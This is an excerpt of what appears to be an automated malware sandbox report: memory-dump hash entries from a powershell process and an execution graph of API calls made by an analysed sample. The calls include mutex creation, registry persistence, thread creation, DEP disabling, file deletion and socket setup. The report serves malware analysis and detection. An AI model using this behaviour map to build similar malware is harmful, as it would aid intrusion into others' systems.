                                • Instruction ID: d92092541d23b606ea0ba356da748fff3e8bce67cb63cc960f53919bb443365c
                                • Opcode Fuzzy Hash: e05ea7165da56ce583afeb61ed3567d502eea7f475fbaa22b39998d4a6ed768f
                                • Instruction Fuzzy Hash: 09117532A00204DFCB55DE29C442FA9BBF5AF84392F258066EC0987271D771DF49C791
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: (op
                                • API String ID: 0-3117038
                                • Opcode ID: 8bc82e14ce883f733873aeaf35cd058fa687b7d02a022d429f11278a4c09a6b3
                                • Instruction ID: c764b340a0b7687bf8403b28b64873db2897be096abe5e234ccb2190cd50db87
                                • Opcode Fuzzy Hash: 8bc82e14ce883f733873aeaf35cd058fa687b7d02a022d429f11278a4c09a6b3
                                • Instruction Fuzzy Hash: 5321B435700A05DFDB268E25C865FAE77A1BB40343F258465EC1A8B5F0C7B4EC9ACB41
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f3815194abf33a2db17e3ae87385b8e6817ea1e93d67f27ab16c1b765bfd1f77
                                • Instruction ID: 03db4f0b86dbff614e8e681f5e7c11e972613445c5f3fa5fadef2e860d3270bb
                                • Opcode Fuzzy Hash: f3815194abf33a2db17e3ae87385b8e6817ea1e93d67f27ab16c1b765bfd1f77
                                • Instruction Fuzzy Hash: 3611CE2464E3C42FC76697754C69B6E6FB68F86301F5584AEE481DF2E3C8A54D098322
                                Memory Dump Source
                                • Source File: 00000006.00000002.373229543.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_1ad000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a455987ca16eb2fe5cc784a79182d9e8255756fd299ccdf42b87c2bb8322f4e
                                • Instruction ID: 7b9cfb0e8447e9f2cd423bfdbad66fbed7a7d59068f411006abe356c314d539b
                                • Opcode Fuzzy Hash: 9a455987ca16eb2fe5cc784a79182d9e8255756fd299ccdf42b87c2bb8322f4e
                                • Instruction Fuzzy Hash: D601DE6140C3C09FD7134B259D98762BFB8EF03224F1984DBE8848F2A3C2689C49C772
                                Memory Dump Source
                                • Source File: 00000006.00000002.373229543.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_1ad000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bffd949c3766a50aaf8d893414a1b2fd9cd0d9a00f3a6a696489d7a2e0738006
                                • Instruction ID: cd20e0b615df865dc0b085ec6b89e95bdb2cd43cbdda4e1472f30ce4b38e81aa
                                • Opcode Fuzzy Hash: bffd949c3766a50aaf8d893414a1b2fd9cd0d9a00f3a6a696489d7a2e0738006
                                • Instruction Fuzzy Hash: BE01F775404780AAE7114E25E984B6BBFD8EF42724F28841AFC464B686C7B9D845C6B1
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 491218917fffab96d49349db164197fe552ed035b48c9aebbba30c3f14a6884a
                                • Instruction ID: ff37e16ed0657607583dab821c0b45d7ecc7832efcdd775a90b52a8f7b48dbbd
                                • Opcode Fuzzy Hash: 491218917fffab96d49349db164197fe552ed035b48c9aebbba30c3f14a6884a
                                • Instruction Fuzzy Hash: 8BF0287474034837C764576A8815F6F589A9FC9701F508418F8059F3C1CDB29C048351
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$L4p$L4p$L4p$L4p$L4p$L4p$\9.$`8.$`8.$`8.$$p$$p
                                • API String ID: 0-757042156
                                • Opcode ID: c69eb1835a577dd73c34413d2d1d332d6fd85c76a7a5de249cf7a2527a4f8b40
                                • Instruction ID: fe58553359cc50fb6964c1ebb2aedef9b7c952c9864de6a7ee24396bf54592ca
                                • Opcode Fuzzy Hash: c69eb1835a577dd73c34413d2d1d332d6fd85c76a7a5de249cf7a2527a4f8b40
                                • Instruction Fuzzy Hash: 0AE12935700244DFCB1A8F68D854B6E7BB6AFC0311F198466ED458B2A1DB72CD49CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$4:.$4:.$h%g$h%g$$p$$p$$p$$p$9.$9.
                                • API String ID: 0-3801674591
                                • Opcode ID: 1637c8cb856781d6e2701d6fa2330e7ee9ed27d7187b262c66516a9a99b1b05e
                                • Instruction ID: e0e785daffda4e04d7e9ec75ad16f0d7f6c282d06f640de7fbe9dd71dfbb01b1
                                • Opcode Fuzzy Hash: 1637c8cb856781d6e2701d6fa2330e7ee9ed27d7187b262c66516a9a99b1b05e
                                • Instruction Fuzzy Hash: 7DC12435B042019FCB268B69D450F6AFBE6AFC5312B29847ADC45CB261DB31CD4ACB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$$p$$p$$p$$p$$p$$p
                                • API String ID: 0-2834719986
                                • Opcode ID: 21993180557915bc4dafe3d5a9c4c86cb36e70421a90cd4b9b2430a231970b2e
                                • Instruction ID: 894b76e1d338838fd6485ab976c33256bcb7ea13775505307be98618467432e0
                                • Opcode Fuzzy Hash: 21993180557915bc4dafe3d5a9c4c86cb36e70421a90cd4b9b2430a231970b2e
                                • Instruction Fuzzy Hash: E35148317042108FC71A9B699810A7AFFB6AFD1316F29847BD945CB2A1DE31CDC9C7A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: $p$$p$$p$$p$$p$$p$[g$[g
                                • API String ID: 0-1459909132
                                • Opcode ID: bf05eb8ed43b1ad89e8cc36673dfb01723d823a3cefef87ebe4d57480eec8142
                                • Instruction ID: 4fe9fdb9bf8f8a46ed34215d0f3f70bdd044a894b633172819c354ac844bfa12
                                • Opcode Fuzzy Hash: bf05eb8ed43b1ad89e8cc36673dfb01723d823a3cefef87ebe4d57480eec8142
                                • Instruction Fuzzy Hash: C6512236B043418FCB268A699410B7AFBF6AFC1312F29846BDC55C7261EB72CC49C761
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: T;.$tPp$tPp$[g$[g
                                • API String ID: 0-3685377804
                                • Opcode ID: 588c950d36d63cfbf758dab76f58c7bc87dfc7a2f236bfbe328b25e11b8be9b8
                                • Instruction ID: 393ff46831bd473630c53b05cd670d0884e5d52548a2c9b58c35e1d535197ea9
                                • Opcode Fuzzy Hash: 588c950d36d63cfbf758dab76f58c7bc87dfc7a2f236bfbe328b25e11b8be9b8
                                • Instruction Fuzzy Hash: F0512C357043409FD7298B69C850F7ABFA6AFC1312F24847AED458B2A5CA73DC49C751
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: h%g$h%g$$p$$p$$p
                                • API String ID: 0-3465359037
                                • Opcode ID: 6006eea74423a94d263054cd9f23eb10479e1fea71ecb3e3fa82eee2f4a5fe4a
                                • Instruction ID: 96bb46e8bb1a8324744510dad8682411210e9ab6bb705ad3df50d1f0527c2ee2
                                • Opcode Fuzzy Hash: 6006eea74423a94d263054cd9f23eb10479e1fea71ecb3e3fa82eee2f4a5fe4a
                                • Instruction Fuzzy Hash: DF5146357002019FCB269A299840F6BFBE6AFC5312F29857AEC05D72A1DB71DC49C7A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 89.$h%g$h%g$tPp$tPp
                                • API String ID: 0-3295721131
                                • Opcode ID: e9353e9aeb4fe54a2a2fda92ed832b1cfaa22c6f55f84dd612aa8c998339ec6c
                                • Instruction ID: 420fa7de14ad81889b7193b934b7d770eab097bc1dd7a1253c4d7f2b39be972c
                                • Opcode Fuzzy Hash: e9353e9aeb4fe54a2a2fda92ed832b1cfaa22c6f55f84dd612aa8c998339ec6c
                                • Instruction Fuzzy Hash: B3512931B043918FC7258A699850F7AFFB6AF85311F59807ADD44CB2A1CA72CC89C761
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$tPp$tPp
                                • API String ID: 0-1182518146
                                • Opcode ID: bde075c0f6da678bface19cb584835b20c99ecf3049b01c7c2a1767557cd2547
                                • Instruction ID: 952f63f1b07eac7f9f7db5f3006a54a764deef6eb47526fc59c9dedab371c28e
                                • Opcode Fuzzy Hash: bde075c0f6da678bface19cb584835b20c99ecf3049b01c7c2a1767557cd2547
                                • Instruction Fuzzy Hash: C1614835B002009FCB1A8F29D410F7ABBA2AF85392F25C469DD458F3A0DE71DE49CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.373293191.0000000000350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_350000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4'p$4'p$X:.$X:.
                                • API String ID: 0-2730352865
                                • Opcode ID: ffdaa999dd9a4c8edd18714616da5ae5923eed1133d3a6cbd077478fe09a847b
                                • Instruction ID: 0c86b05b7708d9d44c47c75bbe18ca51dcdb3accb8788e08e09b11d5d8439e83
                                • Opcode Fuzzy Hash: ffdaa999dd9a4c8edd18714616da5ae5923eed1133d3a6cbd077478fe09a847b
                                • Instruction Fuzzy Hash: 382109317003006BD7299A6CC460F7EBA979FC5712F648429ED498B394DFB2CC45C791

                                Execution Graph

                                Execution Coverage:4.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:4.8%
                                Total number of Nodes:1589
                                Total number of Limit Nodes:54
401e65 22 API calls 47525->47526 47527 40f089 47526->47527 47528 401e65 22 API calls 47527->47528 47529 40f09a 47528->47529 47530 40f0a1 StrToIntA 47529->47530 48032 409de4 47530->48032 47533 401e65 22 API calls 47534 40f0bc 47533->47534 47535 40f101 47534->47535 47536 40f0c8 47534->47536 47538 401e65 22 API calls 47535->47538 48261 4344ea 22 API calls 3 library calls 47536->48261 47540 40f111 47538->47540 47539 40f0d1 47541 401e65 22 API calls 47539->47541 47543 40f159 47540->47543 47544 40f11d 47540->47544 47542 40f0e4 47541->47542 47545 40f0eb CreateThread 47542->47545 47547 401e65 22 API calls 47543->47547 48262 4344ea 22 API calls 3 library calls 47544->48262 47545->47535 49173 419fb4 103 API calls 2 library calls 47545->49173 47549 40f162 47547->47549 47548 40f126 47550 401e65 22 API calls 47548->47550 47552 40f1cc 47549->47552 47553 40f16e 47549->47553 47551 40f138 47550->47551 47556 40f13f CreateThread 47551->47556 47554 401e65 22 API calls 47552->47554 47555 401e65 22 API calls 47553->47555 47557 40f1d5 47554->47557 47558 40f17e 47555->47558 47556->47543 49172 419fb4 103 API calls 2 library calls 47556->49172 47559 40f1e1 47557->47559 47560 40f21a 47557->47560 47561 401e65 22 API calls 47558->47561 47563 401e65 22 API calls 47559->47563 48057 41b60d 47560->48057 47564 40f193 47561->47564 47566 40f1ea 47563->47566 48263 40d9e8 31 API calls 47564->48263 47571 401e65 22 API calls 47566->47571 47567 401f13 28 API calls 47568 40f22e 47567->47568 47570 401f09 11 API calls 47568->47570 47573 40f237 47570->47573 47574 40f1ff 47571->47574 47572 40f1a6 47575 401f13 28 API calls 47572->47575 47576 40f240 SetProcessDEPPolicy 47573->47576 47577 40f243 CreateThread 47573->47577 47584 43baac _strftime 40 API calls 47574->47584 47578 40f1b2 47575->47578 47576->47577 47579 40f264 47577->47579 47580 40f258 CreateThread 47577->47580 49144 40f7a7 47577->49144 47581 401f09 11 API calls 47578->47581 47582 40f279 47579->47582 47583 40f26d CreateThread 47579->47583 47580->47579 
49174 4120f7 138 API calls 47580->49174 47585 40f1bb CreateThread 47581->47585 47587 40f2cc 47582->47587 47589 402093 28 API calls 47582->47589 47583->47582 49176 4126db 38 API calls ___scrt_get_show_window_mode 47583->49176 47586 40f20c 47584->47586 47585->47552 49171 401be9 50 API calls _strftime 47585->49171 48264 40c162 7 API calls 47586->48264 48069 4134ff RegOpenKeyExA 47587->48069 47590 40f29c 47589->47590 48265 4052fd 28 API calls 47590->48265 47596 40f2ed 47597 41bc5e 28 API calls 47596->47597 47599 40f2fd 47597->47599 48266 41361b 31 API calls 47599->48266 47604 40f313 47605 401f09 11 API calls 47604->47605 47608 40f31e 47605->47608 47606 40f346 DeleteFileW 47607 40f34d 47606->47607 47606->47608 47607->47415 47608->47415 47608->47606 47609 40f334 Sleep 47608->47609 47609->47608 47610->47280 47611->47287 47612->47297 47613->47298 47614->47300 47615->47303 47616->47307 47618 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47617->47618 47630 43a43a 47618->47630 47622 438f4c 47623 438f57 47622->47623 47644 43a476 DeleteCriticalSection 47622->47644 47623->47309 47625 438f44 47625->47309 47672 44fb68 47626->47672 47629 438f5a 8 API calls 3 library calls 47629->47314 47631 43a443 47630->47631 47633 43a46c 47631->47633 47634 438f40 47631->47634 47645 438e7f 47631->47645 47650 43a476 DeleteCriticalSection 47633->47650 47634->47625 47636 43a3ec 47634->47636 47665 438d94 47636->47665 47638 43a3f6 47639 43a401 47638->47639 47670 438e42 6 API calls try_get_function 47638->47670 47639->47622 47641 43a40f 47642 43a41c 47641->47642 47671 43a41f 6 API calls ___vcrt_FlsFree 47641->47671 47642->47622 47644->47625 47651 438c73 47645->47651 47648 438eb6 InitializeCriticalSectionAndSpinCount 47649 438ea2 47648->47649 47649->47631 47650->47634 47652 438ca3 47651->47652 47653 438ca7 47651->47653 47652->47653 47657 438cc7 47652->47657 47658 438d13 47652->47658 47653->47648 47653->47649 47655 438cd3 GetProcAddress 47656 438ce3 
__crt_fast_encode_pointer 47655->47656 47656->47653 47657->47653 47657->47655 47659 438d30 47658->47659 47660 438d3b LoadLibraryExW 47658->47660 47659->47652 47661 438d57 GetLastError 47660->47661 47662 438d6f 47660->47662 47661->47662 47663 438d62 LoadLibraryExW 47661->47663 47662->47659 47664 438d86 FreeLibrary 47662->47664 47663->47662 47664->47659 47666 438c73 try_get_function 5 API calls 47665->47666 47667 438dae 47666->47667 47668 438dc6 TlsAlloc 47667->47668 47669 438db7 47667->47669 47669->47638 47670->47641 47671->47639 47675 44fb81 47672->47675 47673 434fcb _ValidateLocalCookies 5 API calls 47674 4345bd 47673->47674 47674->47312 47674->47629 47675->47673 47677 434b27 GetStartupInfoW 47676->47677 47677->47326 47679 44f06b 47678->47679 47680 44f062 47678->47680 47679->47330 47683 44ef58 47680->47683 47682->47330 47703 448215 GetLastError 47683->47703 47685 44ef65 47724 44f077 47685->47724 47687 44ef6d 47733 44ecec 47687->47733 47692 44efc7 47758 446782 20 API calls _free 47692->47758 47696 44ef84 47696->47679 47697 44efc2 47757 4405dd 20 API calls __dosmaperr 47697->47757 47699 44f00b 47699->47692 47760 44ebc2 20 API calls 47699->47760 47700 44efdf 47700->47699 47759 446782 20 API calls _free 47700->47759 47704 448237 47703->47704 47705 44822b 47703->47705 47762 445af3 20 API calls 3 library calls 47704->47762 47761 4487bc 11 API calls 2 library calls 47705->47761 47708 448231 47708->47704 47710 448280 SetLastError 47708->47710 47709 448243 47715 44824b 47709->47715 47764 448812 11 API calls 2 library calls 47709->47764 47710->47685 47713 448260 47713->47715 47716 448267 47713->47716 47714 448251 47718 44828c SetLastError 47714->47718 47763 446782 20 API calls _free 47715->47763 47765 448087 20 API calls __Toupper 47716->47765 47767 4460f4 36 API calls 4 library calls 47718->47767 47719 448272 47766 446782 20 API calls _free 47719->47766 47722 448298 47723 448279 47723->47710 47723->47718 47725 44f083 ___FrameUnwindToState 47724->47725 47726 448215 
__Toupper 36 API calls 47725->47726 47731 44f08d 47726->47731 47728 44f111 ___FrameUnwindToState 47728->47687 47731->47728 47768 4460f4 36 API calls 4 library calls 47731->47768 47769 445888 EnterCriticalSection 47731->47769 47770 446782 20 API calls _free 47731->47770 47771 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 47731->47771 47772 43a7b7 47733->47772 47736 44ed0d GetOEMCP 47738 44ed36 47736->47738 47737 44ed1f 47737->47738 47739 44ed24 GetACP 47737->47739 47738->47696 47740 446137 47738->47740 47739->47738 47741 446175 47740->47741 47745 446145 ___crtLCMapStringA 47740->47745 47783 4405dd 20 API calls __dosmaperr 47741->47783 47742 446160 RtlAllocateHeap 47744 446173 47742->47744 47742->47745 47744->47692 47747 44f119 47744->47747 47745->47741 47745->47742 47782 442f80 7 API calls 2 library calls 47745->47782 47748 44ecec 38 API calls 47747->47748 47749 44f138 47748->47749 47752 44f189 IsValidCodePage 47749->47752 47754 44f13f 47749->47754 47756 44f1ae ___scrt_get_show_window_mode 47749->47756 47750 434fcb _ValidateLocalCookies 5 API calls 47751 44efba 47750->47751 47751->47697 47751->47700 47753 44f19b GetCPInfo 47752->47753 47752->47754 47753->47754 47753->47756 47754->47750 47784 44edc4 GetCPInfo 47756->47784 47757->47692 47758->47696 47759->47699 47760->47692 47761->47708 47762->47709 47763->47714 47764->47713 47765->47719 47766->47723 47767->47722 47768->47731 47769->47731 47770->47731 47771->47731 47773 43a7ca 47772->47773 47774 43a7d4 47772->47774 47773->47736 47773->47737 47774->47773 47775 448215 __Toupper 36 API calls 47774->47775 47776 43a7f5 47775->47776 47780 448364 36 API calls __Toupper 47776->47780 47778 43a80e 47781 448391 36 API calls __cftof 47778->47781 47780->47778 47781->47773 47782->47745 47783->47744 47790 44edfe 47784->47790 47793 44eea8 47784->47793 47787 434fcb _ValidateLocalCookies 5 API calls 47789 44ef54 47787->47789 47789->47754 47794 45112c 47790->47794 47792 44ae66 _swprintf 41 API calls 47792->47793 47793->47787 47795 
43a7b7 __cftof 36 API calls 47794->47795 47796 45114c MultiByteToWideChar 47795->47796 47798 451222 47796->47798 47799 45118a 47796->47799 47800 434fcb _ValidateLocalCookies 5 API calls 47798->47800 47802 446137 ___crtLCMapStringA 21 API calls 47799->47802 47804 4511ab __alloca_probe_16 ___scrt_get_show_window_mode 47799->47804 47803 44ee5f 47800->47803 47801 45121c 47813 435e40 20 API calls _free 47801->47813 47802->47804 47808 44ae66 47803->47808 47804->47801 47806 4511f0 MultiByteToWideChar 47804->47806 47806->47801 47807 45120c GetStringTypeW 47806->47807 47807->47801 47809 43a7b7 __cftof 36 API calls 47808->47809 47810 44ae79 47809->47810 47814 44ac49 47810->47814 47813->47798 47815 44ac64 ___crtLCMapStringA 47814->47815 47816 44ac8a MultiByteToWideChar 47815->47816 47817 44acb4 47816->47817 47818 44ae3e 47816->47818 47821 446137 ___crtLCMapStringA 21 API calls 47817->47821 47824 44acd5 __alloca_probe_16 47817->47824 47819 434fcb _ValidateLocalCookies 5 API calls 47818->47819 47820 44ae51 47819->47820 47820->47792 47821->47824 47822 44ad8a 47850 435e40 20 API calls _free 47822->47850 47823 44ad1e MultiByteToWideChar 47823->47822 47825 44ad37 47823->47825 47824->47822 47824->47823 47841 448bb3 47825->47841 47829 44ad61 47829->47822 47833 448bb3 _strftime 11 API calls 47829->47833 47830 44ad99 47831 446137 ___crtLCMapStringA 21 API calls 47830->47831 47835 44adba __alloca_probe_16 47830->47835 47831->47835 47832 44ae2f 47849 435e40 20 API calls _free 47832->47849 47833->47822 47835->47832 47836 448bb3 _strftime 11 API calls 47835->47836 47837 44ae0e 47836->47837 47837->47832 47838 44ae1d WideCharToMultiByte 47837->47838 47838->47832 47839 44ae5d 47838->47839 47851 435e40 20 API calls _free 47839->47851 47842 4484ca __Toupper 5 API calls 47841->47842 47843 448bda 47842->47843 47846 448be3 47843->47846 47852 448c3b 10 API calls 3 library calls 47843->47852 47845 448c23 LCMapStringW 47845->47846 47847 434fcb _ValidateLocalCookies 5 API calls 47846->47847 47848 
448c35 47847->47848 47848->47822 47848->47829 47848->47830 47849->47822 47850->47818 47851->47822 47852->47845 47854 41cb8f LoadLibraryA GetProcAddress 47853->47854 47855 41cb7f GetModuleHandleA GetProcAddress 47853->47855 47856 41cbb8 44 API calls 47854->47856 47857 41cba8 LoadLibraryA GetProcAddress 47854->47857 47855->47854 47856->47334 47857->47856 48269 41b4a8 FindResourceA 47858->48269 47862 40f3ed _Yarn 48279 4020b7 47862->48279 47865 401fe2 28 API calls 47866 40f413 47865->47866 47867 401fd8 11 API calls 47866->47867 47868 40f41c 47867->47868 47869 43bd51 _Yarn 21 API calls 47868->47869 47870 40f42d _Yarn 47869->47870 48285 406dd8 47870->48285 47872 40f460 47872->47336 47874 40210c 47873->47874 47875 4023ce 11 API calls 47874->47875 47876 402126 47875->47876 47877 402569 28 API calls 47876->47877 47878 402134 47877->47878 47878->47339 48322 4020df 47879->48322 47881 401fd8 11 API calls 47882 41bed0 47881->47882 47883 401fd8 11 API calls 47882->47883 47885 41bed8 47883->47885 47884 41bea0 47886 4041a2 28 API calls 47884->47886 47888 401fd8 11 API calls 47885->47888 47889 41beac 47886->47889 47892 40ea24 47888->47892 47893 401fe2 28 API calls 47889->47893 47890 41be2e 47890->47884 47891 401fe2 28 API calls 47890->47891 47896 401fd8 11 API calls 47890->47896 47900 41be9e 47890->47900 48326 4041a2 47890->48326 48329 41ce34 28 API calls 47890->48329 47891->47890 47901 40fb17 47892->47901 47894 41beb5 47893->47894 47895 401fd8 11 API calls 47894->47895 47897 41bebd 47895->47897 47896->47890 48330 41ce34 28 API calls 47897->48330 47900->47881 47902 40fb23 47901->47902 47904 40fb2a 47901->47904 48337 402163 11 API calls 47902->48337 47904->47344 47906 402163 47905->47906 47907 40219f 47906->47907 48338 402730 11 API calls 47906->48338 47907->47346 47909 402184 48339 402712 11 API calls std::_Deallocate 47909->48339 47913 401e6d 47911->47913 47912 401e75 47912->47351 47913->47912 48340 402158 22 API calls 47913->48340 47917 4020df 11 API calls 47916->47917 47918 
40532a 47917->47918 48341 4032a0 47918->48341 47920 405346 47920->47360 48346 4051ef 47921->48346 47923 406391 48350 402055 47923->48350 47926 401fe2 47927 401ff1 47926->47927 47928 402039 47926->47928 47929 4023ce 11 API calls 47927->47929 47935 401fd8 47928->47935 47930 401ffa 47929->47930 47931 40203c 47930->47931 47932 402015 47930->47932 47933 40267a 11 API calls 47931->47933 48384 403098 28 API calls 47932->48384 47933->47928 47936 4023ce 11 API calls 47935->47936 47937 401fe1 47936->47937 47937->47371 47939 401fd2 47938->47939 47940 401fc9 47938->47940 47939->47377 48385 4025e0 28 API calls 47940->48385 48386 401fab 47942->48386 47944 40d073 CreateMutexA GetLastError 47944->47393 48387 41bfb7 47945->48387 47950 401fe2 28 API calls 47951 41b2ff 47950->47951 47952 401fd8 11 API calls 47951->47952 47953 41b307 47952->47953 47954 4135a6 31 API calls 47953->47954 47956 41b35d 47953->47956 47955 41b330 47954->47955 47957 41b33b StrToIntA 47955->47957 47956->47399 47958 41b349 47957->47958 47961 41b352 47957->47961 48395 41cf69 22 API calls 47958->48395 47960 401fd8 11 API calls 47960->47956 47961->47960 47963 40772a 47962->47963 47964 413549 3 API calls 47963->47964 47965 407731 47964->47965 47965->47411 47965->47412 47967 41bc72 47966->47967 48396 40b904 47967->48396 47969 41bc7a 47969->47427 47971 401f22 47970->47971 47978 401f6a 47970->47978 47972 402252 11 API calls 47971->47972 47973 401f2b 47972->47973 47974 401f6d 47973->47974 47976 401f46 47973->47976 48429 402336 47974->48429 48428 40305c 28 API calls 47976->48428 47979 401f09 47978->47979 47980 402252 11 API calls 47979->47980 47981 401f12 47980->47981 47981->47439 47983 413965 47982->47983 47984 406dd8 28 API calls 47983->47984 47985 41397a 47984->47985 47986 4020f6 28 API calls 47985->47986 47987 41398a 47986->47987 47988 41376f 14 API calls 47987->47988 47989 413994 47988->47989 47990 401fd8 11 API calls 47989->47990 47991 4139a1 47990->47991 47991->47487 47993 40209b 47992->47993 47994 4023ce 11 API 
calls 47993->47994 47995 4020a6 47994->47995 48433 4024ed 47995->48433 47999 4137bf 47998->47999 48000 413788 47998->48000 48001 401fd8 11 API calls 47999->48001 48003 41379a RegSetValueExA RegCloseKey 48000->48003 48002 40ef9e 48001->48002 48002->47490 48003->47999 48005 43bac5 _strftime 48004->48005 48437 43ae03 48005->48437 48007 40efb7 48007->47496 48007->47498 48009 41b5a0 48008->48009 48010 41b505 GetLocalTime 48008->48010 48012 401fd8 11 API calls 48009->48012 48011 40531e 28 API calls 48010->48011 48014 41b547 48011->48014 48013 41b5a8 48012->48013 48015 401fd8 11 API calls 48013->48015 48016 406383 28 API calls 48014->48016 48017 40f00d 48015->48017 48018 41b553 48016->48018 48017->47514 48464 402f10 48018->48464 48021 406383 28 API calls 48022 41b56b 48021->48022 48469 407200 77 API calls 48022->48469 48024 41b579 48025 401fd8 11 API calls 48024->48025 48026 41b585 48025->48026 48027 401fd8 11 API calls 48026->48027 48028 41b58e 48027->48028 48029 401fd8 11 API calls 48028->48029 48030 41b597 48029->48030 48031 401fd8 11 API calls 48030->48031 48031->48009 48033 409e02 _wcslen 48032->48033 48034 409e24 48033->48034 48035 409e0d 48033->48035 48037 40da34 31 API calls 48034->48037 48036 40da34 31 API calls 48035->48036 48038 409e15 48036->48038 48039 409e2c 48037->48039 48040 401f13 28 API calls 48038->48040 48041 401f13 28 API calls 48039->48041 48042 409e1f 48040->48042 48043 409e3a 48041->48043 48045 401f09 11 API calls 48042->48045 48044 401f09 11 API calls 48043->48044 48046 409e42 48044->48046 48047 409e79 48045->48047 48488 40915b 28 API calls 48046->48488 48473 40a109 48047->48473 48049 409e54 48489 403014 48049->48489 48054 401f13 28 API calls 48055 409e69 48054->48055 48056 401f09 11 API calls 48055->48056 48056->48042 48058 41b630 GetUserNameW 48057->48058 48693 40417e 48058->48693 48063 403014 28 API calls 48064 41b672 48063->48064 48065 401f09 11 API calls 48064->48065 48066 41b67b 48065->48066 48067 401f09 11 API calls 48066->48067 48068 
40f223 48067->48068 48068->47567 48070 413520 RegQueryValueExA RegCloseKey 48069->48070 48071 40f2e4 48069->48071 48070->48071 48071->47440 48071->47596 48073 40f392 48072->48073 48074 413a3f RegDeleteValueW 48072->48074 48073->47434 48074->48073 48076 40dd5b 48075->48076 48077 4134ff 3 API calls 48076->48077 48078 40dd62 48077->48078 48082 40dd81 48078->48082 48787 401707 48078->48787 48080 40dd6f 48790 413877 RegCreateKeyA 48080->48790 48083 414f2a 48082->48083 48084 4020df 11 API calls 48083->48084 48085 414f3e 48084->48085 48810 41b8b3 48085->48810 48088 4020df 11 API calls 48089 414f54 48088->48089 48090 401e65 22 API calls 48089->48090 48091 414f62 48090->48091 48092 43baac _strftime 40 API calls 48091->48092 48093 414f6f 48092->48093 48094 414f81 48093->48094 48095 414f74 Sleep 48093->48095 48096 402093 28 API calls 48094->48096 48095->48094 48097 414f90 48096->48097 48098 401e65 22 API calls 48097->48098 48099 414f99 48098->48099 48100 4020f6 28 API calls 48099->48100 48101 414fa4 48100->48101 48102 41be1b 28 API calls 48101->48102 48103 414fac 48102->48103 48814 40489e WSAStartup 48103->48814 48105 414fb6 48106 401e65 22 API calls 48105->48106 48107 414fbf 48106->48107 48108 401e65 22 API calls 48107->48108 48157 41503e 48107->48157 48109 414fd8 48108->48109 48111 401e65 22 API calls 48109->48111 48110 4020f6 28 API calls 48110->48157 48112 414fe9 48111->48112 48114 401e65 22 API calls 48112->48114 48113 41be1b 28 API 